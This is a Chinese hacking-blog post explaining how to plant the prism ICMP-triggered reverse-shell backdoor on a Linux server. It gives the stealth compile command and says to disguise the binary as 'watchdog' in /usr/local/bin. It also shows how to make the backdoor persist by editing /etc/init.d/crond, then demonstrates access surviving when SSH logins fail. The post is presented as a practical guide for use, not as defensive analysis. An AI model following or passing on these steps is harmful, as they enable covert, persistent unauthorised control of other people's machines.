最新文章:

首页 脚本执行

liunx留后门

发布时间:2017年09月19日 评论数:抢沙发 阅读数:19346591

    在这里要为大家提供的是 prism,这个在github里面有,

    编译安装后,执行很简单,只需要执行一条命令,发送一条icmp,这样一条反弹shell就成了。

    有几点需要注意: 
    1. 密码是在文件里面修改,然后编译直接出来的 

    2. 直接./prims就可以执行了

    liunx.png

    实战使用

    • 修改密码,文件prism.c里面搜索p4,我这里修改成了20个Q
    • 编译 gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c
    • 放置 在/usr/local/bin/下面
    • 启动触发, 编辑文件/etc/init.d/crond 插入一行 export PATH=/usr/local/bin/:$PATH && watchdog

    直接测试

    我们刚才已经部署了watchdog,也就是我们的后门,看看效果如何,如果重启crond进程

    cmd.png

    挑战下,将limits设置无效,ssh无法登录,但是看看我们的能不能登录

    下图,修改ulimit无效,nofile已经超过了1048576 
    这里写图片描述

    下图,我们的终端是无法通过ssh登录的 
    这里写图片描述

    下图,我们的后门起作用了,看看nofile是1024,注意,有时候后门输入交互命令后无反应,没关系,可能某些命令无法执行(发现ifconfig不行),我们赶紧把/etc/security/limits.d/移走就好了。 
    这里写图片描述

    事到如今,这个后门可以考虑部署,一旦有问题我们还有个急救措施,否则只能通过物理介入的方式执行了

    KIng安全组发布,工具不提供支持。中国IT脚本官方群 256273754

二维码加载中...
本文作者:KIng、传康      文章标题: liunx留后门
本文地址:http://blog.king-safe.cn/post-26.html
版权声明:若无注明,本文皆为“传康Blog- 致力关注于黑客技术、黑客资源、网络信息安全”原创,转载请保留文章出处。
 相关文章
挤眼 亲亲 咆哮 开心 想想 可怜 糗大了 委屈 哈哈 小声点 右哼哼 左哼哼 疑问 坏笑 赚钱啦 悲伤 耍酷 勾引 厉害 握手 耶 嘻嘻 害羞 鼓掌 馋嘴 抓狂 抱抱 围观 威武 给力
提交评论

清空信息
关闭评论